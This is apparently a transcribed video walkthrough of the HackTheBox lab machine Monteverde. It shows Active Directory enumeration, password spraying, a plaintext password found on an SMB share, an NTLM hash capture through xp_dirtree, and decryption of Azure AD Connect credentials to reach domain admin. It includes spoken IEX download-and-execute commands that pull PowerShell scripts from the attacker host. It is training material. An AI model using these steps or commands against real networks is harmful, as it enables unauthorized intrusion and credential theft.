What's going on YouTube? This is IPSec. I'm doing Monteverde from HackTheBox, which is another box without a web server. This one is just an Active Directory domain controller with a service called AD Connect on it. AD Connect is a Microsoft-supplied application that allows password synchronization between your on-premise Active Directory and Azure or Office 365. This allows your users to have the same password between Office 365 and their normal domain login, like their desktop login. So if they change the password on one, it changes it on the other. The issue with this is Microsoft has to store the password somewhere. In this case, it's stored in an encrypted form in a Microsoft SQL database, but eventually it has to use the password, so it has to decrypt it. And you can use the actual AD Connect service to decrypt the password once you get the hash. And once we get the hash, we're going to be an administrator user. So with that being said, let's just jump in. As always, we start with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Monteverde, and then the IP address, which is 10.10.10.172. But before we run this, we are going to put a sudo here because nmap's detection algorithm differs whether you're root and not root, and root has the better detection algorithm. If you don't believe me, check out the Nest video. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. The first thing I notice, it's most likely a Windows server just because Nmap is screaming Microsoft Windows, but let's go through each of these. We have DNS on port 53, Kerberos on 88, MSRPC on 135 and 445, LDAP is open, and it's telling us the domain is MEGABANK.LOCAL. And we also have, I guess, like encrypted LDAP right here, I believe that is, but enough things to know this is most likely a DC. We don't see a web server or anything like that, so I'm going to start off with just attacking SMB and LDAP. The clock skew is minus 48 minutes, so if we were doing any type of like crypto attack, maybe forging tickets and a golden ticket, silver ticket, one of those type of attacks, we may want to make sure our clocks are synced, but right now it just doesn't matter. So the very first thing I want to do is check out rpcclient. Wait, what was I looking at real quick? We can look at DNS real quick. ns lookup and then do server 172. Look up like localhost, see what this says. Its host name is localhost. Let's do 10.10.10.172. Look up its own IP and doesn't look like we get anything. Serve fail. So I wonder if maybe this IP address got renamed and something is wrong. I'm going to check out megabank.local, which is what nmap said. We do see its IP as 10.10.10.172. So I don't know exactly what its host name is. We could try like Monteverde, the name of the box, and we don't get anything. So maybe at the end of the video, we should just like dump the DNS database to see if there's something weird. I want to say when you normally query a domain controller for its own IP, it leaks the host name, but not positive about that one. So we'll do that after we complete this box. So we can start off with like checking rpcclient with like null authentication. I think it's a lowercase u. We'll do 10.10.10.172. Probably uppercase u. And we get an authentication. So like the previous videos, I'm just going to run enum dom users, and we're going to list all the users here. We could go a step further and enumerate each user, but I'm having a brain fart with what command that is. So I'm just going to hit tab twice and then hit yes to show all commands, and I believe it's this query display info. Additionally, you could just open up Firefox and either Google what you want to do in rpcclient, or go to like ipsec.rocks, search the term like rpc, and I'm kind enough to put all the commands I run in videos, or a lot of them, in this website, so you can see using rpcclient to dump Active Directory information, query display info. So if I just run this command, we could get a bunch of information. You can look at other things you can do with this, and also if you go and search like LDAP, maybe AD, you can see back in the Forest video, we pretty much do the same thing over LDAP. So I don't want to go explain it again, but that is that. So let's go do enum dom users again. And we want to build a word list around all these users. So let's copy this, open up a new tab, vim users.list. I don't know why I said vim, it's vim, but. So I'm just going to do 6x to delete the first 6 characters everywhere. And then we can do $. And I could probably run a sed script to do this, but I'm not a wizard when it comes to regular expressions, and this doesn't take too long to manually do it. If I had more than 10 users, I probably would have looked into automating it, but that is that. So one of the interesting things I see here is this AAD987D7. This is a Active Directory AD sync thing to sync passwords between Azure and an on-premise domain controller. So let's just save this. And I'm just going to run crackmapexec-u users.list, and we're going to give -p passwords.list or users.list. So we're using the username as the password. In a perfect world, I'd probably customize the word list. So I'd do like cp users.list, password.list, and go into this, and also put things like summer, spring, winter, password, and then we'd run like hashcat -- force, as it -- stdout -r user share hashcat rules, and then maybe like best64.rule, and then passwords.list. Did I get all those arguments right? Maybe I did not. Again, if you go to IPSec, do like hashcat word list, using hashcat to generate a custom word list. So we could try this. Mute. And go up a few seconds. Play. So then I'm generating the word list. Let's see. Crap. -- force -- stdout word list -r. That's, oh, it worked. So I had all the arguments right. So we have everything here. It's quite big. So we could then just direct it to a file, password.lst, and then you have a good password list. So wc-l, password.lst. Oh, because I use the same exact file name as whatchamacallit, I erase this file. I do this so freaking often, putting the same thing twice. But you get how that works. So let's just go back and do crackmapexec. And before the username, we have to specify SMB, and then the IP address, 10.10.10.172. I think that's the correct order. Run this and see what it says. There we go. We get a bunch of login failures. And before we run this, you may want to do crackmapexec. We got a hit. SABatchJobs is both. But you may always want to check the password policy. So 10.10.10.172 -- pass pol. And see if it does it without a username password. We may have to specify nothing. Nope, we don't. So this is dumping the password info for the domain. And we can see, let's see, account lockout threshold is none. If you see like 3 or something, you should always be careful with locking accounts out. But here we have account lockout is disabled, which meant it was safe to do this brute force. There's always the chance that they have some type of logging and they detect the brute force. So it's not safe in an OPSEC thing. But if they're not doing logging, they're not locking out, then go ahead and brute force, I guess. So we got SABatchJobs. So we don't have a pwned thing here. So we don't have admin privileges. But let's see, what can we do? We could try Evil-WinRM to see if we can do this, or I think crackmapexec, is that psexec? No, that's not it. MSSQL WinRM. So we could try WinRM to see if this user, oh crap, we probably just want to do SABatchJobs as both the username and password. And then see if this detects that we can get a login shell. If we don't, then the other thing we have is the ability to do like share enumeration. So we failed to authenticate. So let's try SMBMap. And we can do -u, -p, and I think it's -H, 10.10.10.172. And we're just looking at what file shares this guy has access to. And we could also do SMBMap -u, nothing for null, -h, 10.10.10.172. Maybe like SMBClient-u for null, 10.10.10.172. We need -l. -l will list the shares. And interesting enough, SMB client doesn't support null authentication. We could try like guest or anonymous, but we get login failures. So we do have access to, looks like Azure uploads, net login, IPC, sysvol, and users. So let's go take a look at users. And I think it was in the nest, we actually did SMB client, like the mount command to mount each of these to our desktop. I'm not going to worry about that. I'm just going to specify, I think it's the -r flag in SMBMap. So whoops, that's -H, -h. And we can look at what these do. So -r is going to recursively list directories, list contents. So we probably want -r. And we can exclude shares with --exclude. So let's do -r and --exclude. We probably don't want the sysvol or the IPC, because these are just going to have a bunch of junk in it. I can run this command after so you can see the junk in them, but generally that's not going to be too interesting. So we can run this. And I hope it's comma separated. That would make sense. So if it dumps those, then we know, yep, it's not comma separated. So you can see the junk in, this is the IPC showing you all the, I believe it's named pipes, but users doesn't really have anything in it. We see the usernames and that's it. So we don't have privilege to go into the user directories. Sysvol, this is going to be like the Active Directory information. We got a bunch of named pipes here. Is there anything that's super interesting? I haven't actually looked at these. BG. So this is saying that there is a SQL server here. I don't know what this Google crash service is. I don't think anything Google's installed, so we may want to look at that. But nothing too interesting. And then Azure uploads. It's actually not listing the file. Weird. What if I do -R? And this is kind of why I normally prefer mounting things, because you always have these like weird edge cases with tools that just works like 99%, and that 1%, if it's missing what you're expecting, you don't really notice it and you just overlook it. So I'm trying it with a -R to see if, yep, so we want a -R. What was the syntax on those two again? Let's see. Recursively list directories and files. List contents of directory. Default is to list root. So maybe this doesn't go recurse. Yeah. It's missing the word recursively in this -R. I think my mind just said -r is recursive and just assumed it would always be. But no, we want -R. Okay, so we do have privilege to get into the mhope directory with this azure.xml. And I knew something was off with the output when I was looking at the sysvol, and I was like, no, we should be able to read that and get a lot more information like the group policy stuff, but just didn't cross my mind that we weren't recursively going into it. So Azure Uploads is empty, but mhope does have a file. So let's see. We could do SMB client like this, -u, and then specify / users like this, and authenticate with the password of SABatchJobs, and then get azure.xml. Or we probably have to go into mhope, get azure.xml. But where's the fun in that? Let's do this from SMB client, or SMBMap, because I don't know how to do that offhand. So I think --download sounds good. So we can do SMB client, nope, SMBMap, --download users mhope azure.xml. See if this downloads as we expect it. And it looks like it does. And look how it puts the file name. In case we wanted to do like a batch download of something, there are a bunch of servers. You have like the IP address, path, and then file. So looking at this, we can see a plain text password. Another day, another $1. So we can grab this and exit ls. So we can do SMBMap, or let's do CrackMapExec. SMB 10.10.10 172-u user.list-p. Put the password, put it in single quotes because this has quite a few special characters, and then see whose password this is. If I was a betting man, I would say it's mhope because it's the directory that we had found it in, and indeed it is. We don't have the pwn thing, so we can't just psexec to get a shell, but we can change this to be WinRM and see if she has Windows remoting privileges. So running this, come on, any minute now. Authenticating, and we get a pwned. So now we have a reverse shell. So let's do Evil-WinRM. So Evil-WinRM -u mhope-p. That's not the password. Copy. And -i for IP 10.10.10.172. And run this. And looks like we get a shell. If I was on an actual engagement, I would run hostname, who am I, and ipconfig to get a pretty nice screenshot showing we are on the box Monteverde as mhope, and here's the IP address. It's just good to have this information in a screenshot. But the thing we want to do probably is enumerate for a privilege escalation, and I'm going to check Seatbelt because I haven't ran this and I'm just curious. So I'm just going to locate it, and then we can probably run upload. Upload is a Evil-WinRM syntax. It should support directly uploading a file. And I want to say it may actually not work. I think we did this in probably a Resolutes video, and it was the wrong encoding. Let's see what error we get. Whoops, probably just Seatbelt.exe. If I can type /, is it //? Yeah, not a valid application for the source platform. So let's change it up and download. So Python 3-m HTTP server. And I don't have to do sudo with this because I'm listening on port 8000. If I tried to put this to port 80, I think I just put 80 here, we get permission denied because I'm not root. So let's do, what is it? We can probably curl it. Curl 10.10.10.172 / seatbelt.exe -o seatbelt.exe and specify port 8000 and 14.2. I think that's my IP address. If config ton 0, we are 10.10.14.2. And file not found. Oh, we have to copy it. So let's make dir dub so we don't leak all of our files in our working directory. Locate seatbelt cp. Copy it to a directory. And let's try this again. 200 OK sounds much better. And now we have the tool. And it looks like it runs, which is awesome. So if you want to know how to get Seatbelt, pretty much just check that Resolute video. So let's see. -group equals all. -group equal all. And we'll let this run. And it completed in 91 seconds. So a minute and a half. I'm just going to go, let's do C:\users mhope. I'm just going to hit page up. Whoops, too far up. And here we go. Here's where we begin. And after I run Seatbelt, I'm going to go back and we're going to run WinPEAS just to see the difference. I always like running multiple audit checks. So let's see, auto runs, VMware tools, all these cloud things, what do we do? Chrome, cloud credentials, cred-enum, credguard, DNS cache, what version of .NET, dpappy master keys, environment path, environment variables, explicit logon, Firefox stuff, some idle time, installed products. So we do have Google Chrome installed on this. So that explains that Google crash service named pipe we saw at the beginning of the video. We're looking at the shares. So let's see. Bunch of applications installed. We can see Microsoft Azure AD Connect right here, which is interesting. See, interesting files, processes, settings, local GPUs, local groups. We can see we're in a backwards compatibility group. Windows have token global. I don't know exactly what this means. Something to look into, I guess, after this. Oh, these are groups on the box, not groups that we're a member of. Okay. Let's see. AD sync admins. We get a lot of stuff about this AD sync. Service account for synchronization service running on the computer. Named pipes. Bunch of information that doesn't look too beneficial. Scheduled tasks, we have access denied. Windows credential file. But this is pointing us to mhope, which we're that user, so I'm not too interested in it because we already know mhope's password. Firewall stuff, Windows Vault, and that is about it. So let's go take a look at another tool, and that is WinPEAS. So let's go into this www directory and then find winpeas.exe or locate. And let's go and grab this one. I choose you. CP to our directory. Run that curl again, but this time say WinPEAS.exe. And then we'll execute it. And I like going through this tool because it should be colors. Although that being said, okay, I was going to say, it had said something about ANSI color bit for Windows is not set, but we do get colors. So I'm going to pause the video again, and we'll let WinPEAS run and go look over all the results. And it'll probably be easier to go through because of the color coding. So, and now that it's done, we can just go up to the top and see what this tool says. Okay. PowerShell settings, lapse, LSA, credential guard cached, computer name, nothing too interesting yet. Looks like it's just putting everything that says name in red. No AV. It's saying that we have permission to create directories on C:\\, which means if there's a service that has a binary path that's unquoted with a space, we can do some type of injection there. But Seatbelt would have shown that, and WinPEAS shows it, so there's no vulnerable services. And that's the unquoted service path thing. If you want to Google something, Google unquoted service path. Logged on users, ODP sessions, auto login creds, password policy. I'm just going looking for red. We do have Microsoft SQL Server. So generally when I see SQL Server, I run commands to see if we can do like XP command shell, I think it is. XP_CMD shell to execute commands as the SQL service, because oftentimes SQL will also be an admin. So we can probably run like PowerUpSQL to check all that. Let's see. Firewall rules. Nothing too interesting, so didn't really get anything. We can do whoami/all. And we can see we are a member of Azure Admins. So maybe the tool should check that, because I think this is what gives us access into the Azure database on the server. Let's see. Azure Admin. See, current groups. So it does detect the group. It just doesn't highlight it. So we missed it there. We got token groups here. So this is Seatbelt. Seatbelt does show it. Seatbelt does show it on the group name. I just, again, missed it because it wasn't color-coded. So SQLCMD on the box. We put a bad command, we get an error. So we have SQLCMD. I think -L will look for SQL instances on the network. And as I did that, I realized, okay, I thought it could have taken a while. So we don't really get that much information. I think -H, maybe -H, $? There we go. Will give us all the commands this thing runs. So we got -Q for a command line query, and we can do show_DB maybe. Is that a command? No. Select stir from sys.databases. Ooh. We hit a jackpot there. Maybe describe. I don't know MSSQL. Go up. And we can see all the column names here. So create date and probably name. So let's see, name and create_date. I said data, date. So we can see all the names and when they were created on the server. So AD Sync was installed on 2020-01, so January of this year. It was installed at 2:53 p.m. But if you don't know a lot of this syntax, I don't blame you. As you can see, I was struggling. So there is a tool called PowerUpSQL. Do I just have it in opt? We don't have it yet, so let's download it. GitHub, PowerUpSQL. And we can grab the tool, git clone, and cd PowerUpSQL. Let's just copy the .ps1 file to HDB Monteverde, and we put it in the www directory. And I know Evil-WinRM has some like hidden options where you can have this automatically import PowerShell scripts, but I just have bad experiences with that. So I always do IEX. New object, net.web client, download string, HTTP 10.10.14.2, 8000, PowerUpSQL.ps1. Okay. While that goes, PowerUpSQL cheat sheet. Because this is not one I often use. I'm just going to close this. Looks like that's a old tab. So let's see. Get SQL instance verbose. And this is a command that is inside of PowerUpSQL. And looks like we don't have permission to this get WMI object thing. Let's see. Instance. Verbose. I'm looking for one for like privilege escalation. Here we go. SQL. Let's do invoke SQL audit. And I'm just going to specify dash verbose. And we'll see what this says. If we didn't have verbose, everything here probably would not be said. Right here, it's checking for like XP file exist, XPCMD shell and things, and seeing if we can actually execute it. Now it's checking all the databases if we have anything. So I'm just going to let this run and we will resume when it's done. And almost finished as soon as I finish saying that. So we have quite a bit of information here. Let's just go to the top. What was it? Invoke audit. Audit. Let's just page up. Okay, so let's see. Running. So I wonder if we can search semicolon start. There we go. So starting the vulnerability check of default login. Now it's checking some weak passwords. Looking for impersonate login. Another impersonate login. Seeing if we can change database ownership. We don't have anything. Looking at like the create procedure. Looking at XP directory. If we had any of these file things, we could potentially write a file as this user, but more importantly, we could try to write a file or include a file from our server, and when we make it do a request back to our server over SMB, we can steal the hash of the user that is trying to log into our SMB share with. Let's see. And I bet if you just went back to ipsec.rocks, and searched for like XP underscore. There we go. In the query video, we do that. So get a lot of information from that site, but looking through things, goes owner, doesn't really look like we have anything. Is vulnerable? Yes. Is exploitable? No. I don't know what difference between vulnerable and exploitable is. Here we go. Oh, this is a list of, I guess, vulnerable things. So ownership chaining was found to be enabled. So it's vulnerable because this functionality is there, but nothing's configured in a way that we can exploit, it looks like. So this one is still that. Looks like all these are database owner, except privilege, XP directory. Oh, we do have this command. So we could potentially try to crack that password. Let's see. Let's see if I can do this off of memory. Wow, this is a lot of information it gives. CMD _ shell. So let's try XP directory. Can we do like SQLCMD? Was it -Q? 10.10.14.2 test. Responder -I ton 0 sudo. I don't like all the syntax warnings. Maybe put this in quotes. And we can get a password hash. So that's definitely interesting. I'm going to dig down this rabbit hole real quick because I'm not sure if this is actually crackable. I don't have... Crap. Let's see. Do I know the password to this? I do. So the Kraken is just a local box on my network that I use for cracking because it's a very CPU intensive thing and I don't want to do this on, well, number one, in a VM, and number two, on the machine I'm recording from, because I could start dropping frames. So let's see. Let's go to hashcat v hashes Monteverde, paste, and this is, let's see, hashcat example hashes. Let's see, what is this? It's probably net NTLM v2. That looks okay. So 5600. Hashcat -m 5600 hashes Monteverde opt word list rock u, and we'll do rules best64. Let's see, can we get a shell as this user? And I don't think it cracked. Recovered 0 out of 1. So this is what you'd keep doing, and maybe you get a shell, maybe you don't. If there was another Windows box, we could potentially do a NTLM relay attack, but you can't relay the hash back against its own server. So that's not going to be too interesting. So let's move on and go through the intended path. If you did a bunch of Googling around the Azure AD privilege escalation, maybe. Let's see. Is this going to be it? Bunch of blogs. The one I like is from XPN. So I'm just going to search that, blog.xpnsec.com, Azure AD Connect for red teamers. I think this was the first one that went into this detail. So this is going about setting up the lab. essentially what this part is saying is Azure AD Connect is a tool to synchronize password hashes between Azure, aka Office 365, and your on-prem. So if you use Office 365 for your organization, you may want to have the same password for email as they do to log in. I think it's kind of a silly thing to do if you're not really super familiar in Azure, because it kind of just opens up your local Active Directory to the cloud, and people can potentially brute force to get usernames, passwords, etc. But a lot of people like doing it because they like password synchronization. So this is how Microsoft syncs those two. They use a program like Azure AD Connect. I don't think it's actually a thing anymore in 2019. 2019 may just have it built in, but I'm not positive about that one. So PHS, password hash synchronization, when you read this. So it's talking about it. Right here, they're selecting stuff from a database. So inside the Azure AD Connect database, if we go back up here, where was that? Select name, create date. Inside this AD Sync database, there is a MMS management agent in private configuration XML. So these two fields are, let's just grab this. Let's see. Paste and paste. And this is from, what is it? AD sync dot, what is the table? And then field. Let's see, maybe here. So select. MA type is that. Looking at like maybe I just do, I gotta do from something, right? Yeah. Let's see. Oh, there it is, from MMS Management Agent. So I copied the wrong thing. Let's do AD sync dot this. And if we just do private configuration, select, we need from. Do we put, is it .ad sync here? I wonder if we can't do that in Azure. Let's do use AD sync. There we go. So if we get private configuration XML from this table on the database AD sync, here's what it contains. We have the forest name, forest GUID, forest login, and forest login domain. If we grab the encrypted configuration as well, it's going to display all the same thing, except we have a encrypted password here. I don't know what's up here, OC-V. Don't know what that is. If you echo-n this, base64-d, and xxd. Oh, whoops. I am on my reverse shell. Go down here, run the same thing. You can see the encrypted password definitely looks encrypted. We don't get a lot of plain text. But what they do on this tool is they actually import the MCRYPT.DLL, which is a DLL for this, and then use the internal commands to mcrypt to just decrypt it. Because for Azure AD Sync to work, it has to know the password somehow. So they just encrypt it, probably with a static string across all installs, because that's what organizations like doing, and then you get the password. So let's see, we need to probably populate something, maybe. Actually stored within that. Crypt POC, so let's copy this and walk through what the script does. Okay, v decrypt.ps1. Paste. I wish I had syntax highlighting in Vim enabled. Let's see, I wonder if I cp decrypt to decrypt.sh. We got some syntax highlighting. This is better than none. So let's see. Right here, we are opening the database, creating the command, and we're getting key set ID, instance ID, and entropy. So if we wanted to, could go back up here and run all that. So it's doing select, key set ID, instance ID, and entropy. From MMS server configuration. So you can see 1, here's the instance ID, here's the entropy. This entropy is used, it's not a static key to decrypt. So it's probably entropy plus a static key. So think of this maybe as a salt. So if you didn't have this piece of information, you probably can't decrypt with that DLL. So we'll figure it out as we keep going through this. So right here, we're assigning each of those fields to a variable, like key ID is the first number, that was 1. Then instance ID is the GUID, and entropy is GUID2. So 0, 1, 2. And then we're closing that reader. So now we're going to run a second command, and this is going to be pretty much what we did the first time when we were looking at the private configuration and encrypted configuration. And it's getting string 0, so config is going to be on config variable, and encrypted is on 1, and then it closes. So here we're loading the MCRYPT.DLL, and then specifying, maybe this is class path. I always forget terminology, but loading it, and now we're actually calling the load key set function or method out of that DLL, and then getting active credential key, get key, and then key 2 is decrypting the base 64, converting it to a string. And then selecting all the XML out of that private configuration to get this stuff. So let's see what happens when we run that. Let's do ix, new object, net web client, download string, 10, 10, 14, 2, 8000, decrypt.ps1. Sure. And it's running. Taking a while to run. I did not expect it to take this long, so maybe something went wrong. Let's see. Do not return a proper response. Ooh, WinRM crashed. That is weird. And try running this again. Does it crash WinRM every time? We get the session here. It looks like it does. Huh. So let's go and break this down and see exactly where it's failing. So I'm going to switch to a new pane, get the shell, and then I'm going to cat decrypt.ps1. Let's just do head -10 to do 10 lines. And let's step through exactly what it's doing. So right here, we're creating the SQL connection. So paste this, and then we're opening it up. So this creates the object, and then this does the actual connection. And it looks like it is taking its time. Let's see. Is it going to fail? And let's see, a network-related instance-specific error occurred when establishing connection to the SQL server. Server is not found or accessible. Verify the instance name is correct and the SQL server is configured to allow remote connections. So there's two things here. We're not doing a remote connection. We're doing a local connection. And maybe the syntax is off. If we look at the blog post, I think it's doing a Express install. Yeah, it's using SQL with Express settings. So let's go and copy this. I wonder if we have examples of this exact command. So go to Google. Test a SQL connection. We can see other ways of doing this. Connection string. So this is data source, database, ID, password. Let's see. PowerShell to SQL Server. SQLPS. So server, integrated security true, initial catalog, master. So let's try this. Let's take this string and see what happens if we do this one. Copy. And let's go here. Change this. So we want server. I'm not going to specify the username. I'm just going to do localhost. Integrated security is true. And initial catalog, let's do, what is it, AD sync? I'm sure there's probably a database flag as well we could do instead of initial catalog. Now let's open this and see if it errors. That looks good. So we can keep running through this to make sure we actually get something. So copy this next thing. Execute the reader. So this is executing this SQL command. Reading the result and assigning key ID. And if we get 1 here, we know it worked. So we just need to replace the string here. So let's go v-decrypt, v-decrypt.ps1, and let's see, SQL Connection, paste, okay. Whoops, I meant to do search. Right now, I am just searching for SQLClient.SQL Connection to see if this exists anywhere else in the script. Doesn't look like it does. So save these changes. Go here. And let's copy this IEX. And run it again. And there we go. We get megabank.local, username administrator, password domain admin, yeah. So we can go back, look at CrackMapExec. We can just do administrator, I guess, and -p. Put the password. Probably should have put it in single quotes because it has some special characters, so we'll see how CrackMapExec handles this. And I don't want to do WinRM mode, I want to do SMB mode. And we can see the pwned. So if we do psexec.py administrator at 10.10.10.172, paste the password, and we're getting a shell as the system user on this box. So there's one thing I want to do on this before we close off the video. And I haven't actually looked at this, but I want to look at just this one binary. Let's see, that DLL. So I'm going to, because the blog post, I don't know if it goes into everything. Let's see. Oh, he does. So he got this out of that MCRYPT.DLL. And looks like he probably just decompiled that. I'm guessing that's a .NET thing. So that's what we're going to verify now. So let's see. www.decrypt.ps1. And I want to go and look at this binary. So cd. And then download mcrypt.dll. If we exit out of here, file mcrypt.dll, we can see it is indeed a .NET assembly. So we should be able to go up, and my commando is not here. Let's see, commando, looks like I have to start this. Full screen. Hopefully it doesn't do Windows updates. Don't need these tabs. And I guess we can start the SMB server. So let's move mcrypt to, I guess, SMB. And then, what is it? Mpacket SMB server dash SMB2 support dash user ipsec dash password. Please subscribe. The share name, we'll call this one like this video. And then the share path, we have to do it with sudo. We should be booted up. Password, maybe, do I have it as please subscribe? I do have that as the password. So let's see. What was it? What is the decompiling tool I normally use? Wow, I'm drawing a, is it IL? IL spy? No. Maybe? That's not it. It was a dark theme. Let's go back to ipsec.rocks. Decompile dnspy. Run the command. Now we can 172.16.10. I think 209 is my IP of Cali, or parrot. Path was like this video. Copy to my desktop and do file open. Let's see. C:, users, ipsec, desktop, mcrypt.dll. And let's see. Key, encrypt string to base 64, decrypt base 64 to string. That is one of the functions we had called. So let's take a look at the script again. Vim www.decrypt. We'll do sh so we have the syntax highlighting. So the very first thing we do is load key set, get active credential key, get key, and decrypt. So we're in Microsoft Directory Service Metadata Services Cryptography Key Manager. So let's go back over to here, mcrypt, Microsoft Directory Services Metadirectory Service Cryptography, and we were in Key Manager. That's the class path we loaded. So we can see all of these. So get key, and you can see it takes two variables, the key ID and PP key. So if we look back here, let's see, load set key, get key. This is going to be the instance ID, and key 2, we're passing it null, which is nothing. Load key set, you can look at that as well. It's taking entropy, MMS, key set ID. If you look here, instance is entropy, instance ID, and key ID. So you can see everything it is doing. It's just loading this DLL and calling these as it needs it. So the next one was what? Get active credential key right here. And let's see. What is crypted equal? Oh, crypted, this is the result of encrypted configuration right here. And decrypted, this is where it saves it to. Let's see. The interesting thing is, I guess it's automatically using this get key and get active credential key. So if we look at this decrypt base64 to string, let's see what it does. That was under key, I believe. Let's see. Whoops, did not mean to click that. BZ encrypted, plain text. I'm guessing this .mp key is grabbing the active key, which is from this get key thing. So there was one last thing I wanted to look at, and that was the DNS zone, just because I'm curious what IP this guy thinks himself is. Because in Active Directory, you generally never want to change the IP address of a domain controller, and I believe the IP address may have changed because generally when people create boxes, they assign an IP, then give it to HackTheBox, and HackTheBox changes the IP. So I just wanted export the DNS zone and see if that is the case here. So let's see. Let's go back to which pane had the admin password. I don't actually know what the admin password is. That is it not this one? Weird. I guess we can just run this again. Let's see. Decrypt.sh. Let's go to cd www. Python 3-m HTTP server, and then IEX new object net web client download string HTTP 10.10.14.2 8000 decrypt.ps1. Okay. I can't believe I typed that without a typo, but got the password here. And let's do Evil-WinRM. I don't know if we need to be an administrator to run this. I'd presume not, but it's always safer to do it from administrator. So -u administrator -p -i 10.10.10.172. And we should be able to get a shell, and I think it's export DNS zone -file name test maybe zone MEGABANK.LOCAL. And we don't have that snippet. PowerShell dump DNS zone. Export DNS server zone. DNS server zone. Sweet. It's taking a bit longer, so I'm guessing this time it's actually exporting. And we can do GC for get content test. ls. Did not dump it. Maybe it's -file, not file name. File name. -zone is not a thing. Maybe -name. Yeah. So file name and dash name. Sometimes it helps to read the documentation before you go in. Fail to locate the zone for megabank.local on server Monteverde. What? I thought that was the domain. Exit CrackMapExec SMB 10.10.10.172. See, megabank.local. That should be it. PowerShell list DNS zones. Get DNS server zone. Let's try this command. Dash name, megabank.local, on server to file test. Okay, I think it was saying the file existed, and we're not writing where we think we are. This is probably writing it in like C:\Windows System 32. C:\, users, administrator, documents. Let's see. Where does it extract the zones to? File name. Let's see. Does the error message say? Microsoft ... Let's see, dir. It's probably in Windows somewhere. Let's see. PowerShell, search for file, GCI. Get child item dash recurse. Let's see, dash include, I think. GCI, recurse, include, megabank. This could take a little bit. Let's see. Export DNS server zone. What if we just don't give it a file name if it goes to standard out? Let's try this real quick. Oh, there we go. C:\Windows System 32 DNS. So let's see, Evil-WinRM. We want to do the administrator. Come on, connect. CD, Windows, sysvol. I don't think that's it. System 32 DNS. There we go. And we can do type. And let's see what its IP address is. Oh, looks like it is correct. 10.10.10.172. Let's see. Monteverde is set to the correct IP address here. So this is kind of handy to do when you're on a box and want to look at all the DNS records. You can just export this and then you'll have all the host names of the zone. But that'll be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.